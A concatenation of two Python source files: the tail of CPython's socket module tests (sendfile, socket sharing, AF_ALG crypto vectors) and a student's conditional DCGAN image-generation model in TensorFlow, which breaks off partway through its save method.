self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
model.py
|
"""
Namita Vagdevi Cherukuru
C32671672
Introduction to Information Retrieval
Project Phase II
"""
from __future__ import division
import os
import time
import Queue
import threading
from PIL import Image
from cStringIO import StringIO
import math
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
def conv_out_size_same(size, stride):
return int(math.ceil(float(size) / float(stride)))
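# Worked example for the helper above (illustration only): with "same"
# padding, a stride-2 layer over a 64-wide feature map produces
# conv_out_size_same(64, 2) == ceil(64 / 2) == 32, and an odd input gives
# conv_out_size_same(7, 2) == ceil(7 / 2) == 4.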
class DCGAN(object):
def __init__(self, sess, input_height=64, input_width=64, crop=True,
batch_size=64, sample_num = 64, output_height=64, output_width=64,
y_dim=6, z_dim=256, c_dim=3, dataset_name='default',
input_fname_pattern='*.jpg', checkpoint_dir=None, sample_dir=None):
"""
Args:
sess: TensorFlow session
batch_size: The size of batch. Should be specified before training.
      y_dim: (optional) Dimension of the condition (label) vector y. [6]
      z_dim: (optional) Dimension of the input noise vector z. [256]
gf_dim: (optional) Dimension of gen filters in first conv layer. [64]
df_dim: (optional) Dimension of discrim filters in first conv layer. [64]
      gfc_dim: (optional) Dimension of gen units for fully connected layer. [1024]
dfc_dim: (optional) Dimension of discrim units for fully connected layer. [1024]
c_dim: (optional) Dimension of image color. For grayscale input, set to 1. [3]
"""
self.sess = sess
self.crop = crop
self.batch_size = batch_size
self.sample_num = sample_num
self.input_height = input_height
self.input_width = input_width
self.output_height = output_height
self.output_width = output_width
self.y_dim = y_dim
self.z_dim = z_dim
self.is_train = tf.placeholder(tf.bool, [])
    # batch normalization: deals with poor initialization and helps gradient flow
with tf.variable_scope('GAN'):
self.d_bn1 = batch_norm(name='d_bn1')
self.d_bn2 = batch_norm(name='d_bn2')
self.d_bn3 = batch_norm(name='d_bn3')
self.d_bn4 = batch_norm(name='d_bn4')
self.g_bn0 = batch_norm(name='g_bn0')
self.g_bn1 = batch_norm(name='g_bn1')
self.g_bn2 = batch_norm(name='g_bn2')
self.g_bn3 = batch_norm(name='g_bn3')
self.g_bn4 = batch_norm(name='g_bn4')
self.g_bn5 = batch_norm(name='g_bn5')
self.g_bn6 = batch_norm(name='g_bn6')
self.dataset_name = dataset_name
self.input_fname_pattern = input_fname_pattern
self.checkpoint_dir = checkpoint_dir
_,_,_,self.data,_,_=np.load('../'+self.dataset_name)
self.c_dim=3
self.grayscale = (self.c_dim == 1)
self.build_model()
def build_model(self):
self.y= tf.placeholder(tf.float32, [self.batch_size, self.y_dim], name='y')
if self.crop:
image_dims = [self.output_height, self.output_width, self.c_dim]
else:
image_dims = [self.input_height, self.input_width, self.c_dim]
self.inputs = tf.placeholder(
tf.float32, [self.batch_size] + image_dims, name='real_images')
self.sample_inputs = tf.placeholder(
tf.float32, [self.sample_num] + image_dims, name='sample_inputs')
inputs = self.inputs
sample_inputs = self.sample_inputs
self.z = tf.placeholder(
tf.float32, [None, self.z_dim], name='z')
self.z_sum = histogram_summary("z", self.z)
self.G = self.generator(self.z, self.y)
self.D = \
self.discriminator(inputs, self.y, reuse=False)
self.sampler = self.sampler(self.z, self.y)
self.D_ = \
self.discriminator(self.G, self.y, reuse=True)
self.d_sum = histogram_summary("d", self.D)
self.d__sum = histogram_summary("d_", self.D_)
self.G_sum = image_summary("G", self.G)
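    # The objectives below are least-squares (LSGAN-style) losses rather than
    # the original cross-entropy DCGAN losses: the discriminator is pushed
    # toward 1 on real images and toward 0 on generated ones, while the
    # generator is pushed toward 1 on its own samples.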
self.d_loss_real = tf.reduce_mean(tf.square(self.D-1))
self.d_loss_fake = tf.reduce_mean(tf.square(self.D_))
self.g_loss = tf.reduce_mean(tf.square(self.D_-1))
self.d_loss_real_sum = scalar_summary("d_loss_real", self.d_loss_real)
self.d_loss_fake_sum = scalar_summary("d_loss_fake", self.d_loss_fake)
self.d_loss = (self.d_loss_real + self.d_loss_fake)/2
self.g_loss_sum = scalar_summary("g_loss", self.g_loss)
self.d_loss_sum = scalar_summary("d_loss", self.d_loss)
t_vars = tf.trainable_variables()
self.d_vars = [var for var in t_vars if 'd_' in var.name]
self.g_vars = [var for var in t_vars if 'g_' in var.name]
self.saver = tf.train.Saver([k for k in tf.global_variables() if k.name.startswith('GAN')])
def train(self, config):
d_optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1, beta2=0.99) \
.minimize(self.d_loss, var_list=self.d_vars)
g_optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1, beta2=0.99) \
.minimize(self.g_loss, var_list=self.g_vars)
try:
tf.global_variables_initializer().run()
except:
tf.initialize_all_variables().run()
self.g_sum = merge_summary([self.z_sum, self.d__sum,
self.G_sum, self.d_loss_fake_sum, self.g_loss_sum])
self.d_sum = merge_summary(
[self.z_sum, self.d_sum, self.d_loss_real_sum, self.d_loss_sum])
self.writer = SummaryWriter("./logs", self.sess.graph)
sample_z = np.random.normal(size=(self.sample_num , self.z_dim))
#sample_z = rand_z/np.linalg.norm(rand_z, axis=1, keepdims=True)
def load_batch(q):
imgs=np.zeros([self.batch_size,64,64,self.c_dim])
labels=np.zeros([self.batch_size,self.y_dim])
itemnum=len(self.data)
while True:
for i in range(self.batch_size):
idx = np.random.randint(itemnum)
jpg=np.asarray(Image.open(StringIO(self.data[idx]['imgs'])).convert('RGB').resize((64,64)))
jpg=(jpg-127.5)/127.5
y=self.data[idx]['c']
imgs[i],labels[i]=jpg,y
q.put((imgs,labels))
q=Queue.Queue(maxsize=5)
for i in range(1):
t = threading.Thread(target=load_batch,args=[q])
t.start()
if config.dataset == 'mnist':
sample_inputs = self.data_X[0:self.sample_num]
sample_labels = self.data_y[0:self.sample_num]
else:
sample_inputs, sample_labels = q.get()
counter = 1
start_time = time.time()
could_load, checkpoint_counter = self.load(self.checkpoint_dir)
if could_load:
counter = checkpoint_counter
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for epoch in xrange(config.epoch):
#self.data = glob(os.path.join(
# "./data", config.dataset, self.input_fname_pattern))
batch_idxs = min(len(self.data), config.train_size) // config.batch_size
for idx in xrange(0, batch_idxs):
if config.dataset == 'mnist':
batch_images = self.data_X[idx*config.batch_size:(idx+1)*config.batch_size]
batch_labels = self.data_y[idx*config.batch_size:(idx+1)*config.batch_size]
else:
batch_images,batch_labels=q.get()
batch_z = np.random.normal(size=(config.batch_size, self.z_dim))
#batch_z = batch_z/np.linalg.norm(batch_z,axis=1,keepdims=True)
if True:
# Update D network
_, summary_str = self.sess.run([d_optim, self.d_sum],
feed_dict={
self.inputs: batch_images,
self.z: batch_z,
self.y:batch_labels,
self.is_train: True
})
self.writer.add_summary(summary_str, counter)
# Update G network
_, summary_str = self.sess.run([g_optim, self.g_sum],
feed_dict={
self.z: batch_z,
self.y:batch_labels,
self.is_train: True
})
self.writer.add_summary(summary_str, counter)
# Run g_optim twice to make sure that d_loss does not go to zero (different from paper)
#_, summary_str = self.sess.run([g_optim, self.g_sum],
# feed_dict={ self.z: batch_z, self.y:batch_labels })
#self.writer.add_summary(summary_str, counter)
errD_fake = self.d_loss_fake.eval({
self.z: batch_z,
self.y:batch_labels,
self.is_train: False
})
errD_real = self.d_loss_real.eval({
self.inputs: batch_images,
self.y:batch_labels,
self.is_train: False
})
errG = self.g_loss.eval({
self.z: batch_z,
self.y: batch_labels,
self.is_train: False
})
counter += 1
print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \
% (epoch, idx, batch_idxs,
time.time() - start_time, errD_fake+errD_real, errG))
if np.mod(counter, 100) == 1:
if config.dataset == 'mnist':
samples, d_loss, g_loss = self.sess.run(
[self.sampler, self.d_loss, self.g_loss],
feed_dict={
self.z: sample_z,
self.inputs: sample_inputs,
self.y:sample_labels,
self.is_train: False
}
)
manifold_h = int(np.ceil(np.sqrt(samples.shape[0])))
manifold_w = int(np.floor(np.sqrt(samples.shape[0])))
save_images(samples, [manifold_h, manifold_w],
'./{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx))
print("[Sample] d_loss: %.8f, g_loss: %.8f" % (d_loss, g_loss))
else:
try:
samples, d_loss, g_loss = self.sess.run(
[self.sampler, self.d_loss, self.g_loss],
feed_dict={
self.z: sample_z,
self.inputs: sample_inputs,
self.y:sample_labels,
self.is_train: False
},
)
manifold_h = int(np.ceil(np.sqrt(samples.shape[0])))
manifold_w = int(np.floor(np.sqrt(samples.shape[0])))
save_images(samples, [manifold_h, manifold_w],
'./{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx))
print("[Sample] d_loss: %.8f, g_loss: %.8f" % (d_loss, g_loss))
except:
print("one pic error!...")
if np.mod(counter, 500) == 2:
self.save(config.checkpoint_dir, counter)
def discriminator(self, image, y=None, reuse=False):
with tf.variable_scope("discriminator") as scope:
if reuse:
scope.reuse_variables()
yb = tf.reshape(y, [self.batch_size, 1, 1, self.y_dim])
x = conv_cond_concat(image, yb)
h0 = lrelu(conv2d(x, 64, name='d_h0_conv'))
h0 = conv_cond_concat(h0, yb)
h1 = lrelu(self.d_bn1(conv2d(h0, 128, name='d_h1_conv'),is_train=self.is_train))
h1 = conv_cond_concat(h1, yb)
h2 = lrelu(self.d_bn2(conv2d(h1, 256, name='d_h2_conv'),is_train=self.is_train))
h2 = conv_cond_concat(h2, yb)
h3 = lrelu(self.d_bn3(conv2d(h2, 512, name='d_h3_conv'),is_train=self.is_train))
#h3 = conv_cond_concat(h3, yb)
#h4 = lrelu(self.d_bn4(linear(tf.reshape(h3, [int(h3.get_shape()[0]), -1]), 1024, 'd_h3_lin')))
#h4 = tf.concat([h4, y],1)
#h5 = linear(tf.reshape(h4, [int(h4.get_shape()[0]), -1]), 1, 'd_h4_lin')
h4=linear(tf.reshape(h3, [int(h3.get_shape()[0]), -1]), 1, 'd_h4_lin')
return h4
def generator(self, z, y=None):
with tf.variable_scope("generator") as scope:
z = tf.concat([z, y], 1)
self.z_, self.h0_w, self.h0_b = linear(z, 4*4*256, 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(self.z_, [-1, 4, 4, 256])
h0 = lrelu(self.g_bn0(self.h0,is_train=self.is_train))
self.h1, self.h1_w, self.h1_b = deconv2d(h0,
[self.batch_size, 8, 8, 256], name='g_h1', with_w=True)
h1 = lrelu(self.g_bn1(self.h1,is_train=self.is_train))
self.h2, self.h2_w, self.h2_b = deconv2d(h1,
[self.batch_size, 8, 8, 256], stride=1, name='g_h2', with_w=True)
h2 = lrelu(self.g_bn2(self.h2,is_train=self.is_train))
h3, self.h3_w, self.h3_b = deconv2d(h2,
[self.batch_size, 16, 16, 256], name='g_h3', with_w=True)
h3 = lrelu(self.g_bn3(h3,is_train=self.is_train))
h4, self.h4_w, self.h4_b = deconv2d(h3,
[self.batch_size, 16, 16, 256], stride=1, name='g_h4', with_w=True)
h4 = lrelu(self.g_bn4(h4,is_train=self.is_train))
h5, self.h5_w, self.h5_b = deconv2d(h4,
[self.batch_size, 32, 32, 128], name='g_h5', with_w=True)
h5 = lrelu(self.g_bn5(h5,is_train=self.is_train))
h6, self.h6_w, self.h6_b = deconv2d(h5,
[self.batch_size, 64, 64, 64], name='g_h6', with_w=True)
h6 = lrelu(self.g_bn6(h6,is_train=self.is_train))
h7, self.h7_w, self.h7_b = deconv2d(h6,
[self.batch_size, 64, 64, 3], stride=1, name='g_h7', with_w=True)
return tf.nn.tanh(h7)
def sampler(self, z, y=None):
with tf.variable_scope("generator") as scope:
scope.reuse_variables()
z = tf.concat([z, y], 1)
self.z_, self.h0_w, self.h0_b = linear(z, 4*4*256, 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(self.z_, [-1, 4, 4, 256])
h0 = lrelu(self.g_bn0(self.h0,is_train=self.is_train))
self.h1, self.h1_w, self.h1_b = deconv2d(h0,
[self.batch_size, 8, 8, 256], name='g_h1', with_w=True)
h1 = lrelu(self.g_bn1(self.h1,is_train=self.is_train))
self.h2, self.h2_w, self.h2_b = deconv2d(h1,
[self.batch_size, 8, 8, 256], stride=1, name='g_h2', with_w=True)
h2 = lrelu(self.g_bn2(self.h2,is_train=self.is_train))
h3, self.h3_w, self.h3_b = deconv2d(h2,
[self.batch_size, 16, 16, 256], name='g_h3', with_w=True)
h3 = lrelu(self.g_bn3(h3,is_train=self.is_train))
h4, self.h4_w, self.h4_b = deconv2d(h3,
[self.batch_size, 16, 16, 256], stride=1, name='g_h4', with_w=True)
h4 = lrelu(self.g_bn4(h4,is_train=self.is_train))
h5, self.h5_w, self.h5_b = deconv2d(h4,
[self.batch_size, 32, 32, 128], name='g_h5', with_w=True)
h5 = lrelu(self.g_bn5(h5,is_train=self.is_train))
h6, self.h6_w, self.h6_b = deconv2d(h5,
[self.batch_size, 64, 64, 64], name='g_h6', with_w=True)
h6 = lrelu(self.g_bn6(h6,is_train=self.is_train))
h7, self.h7_w, self.h7_b = deconv2d(h6,
[self.batch_size, 64, 64, 3], stride=1, name='g_h7', with_w=True)
return tf.nn.tanh(h7)
@property
def model_dir(self):
return "{}_{}_{}_{}".format(
self.dataset_name, self.batch_size,
self.output_height, self.output_width)
def save(self, checkpoint_dir, step):
model_name = "DCGAN.model"
checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
if not os.path.exists(checkpoint_dir):
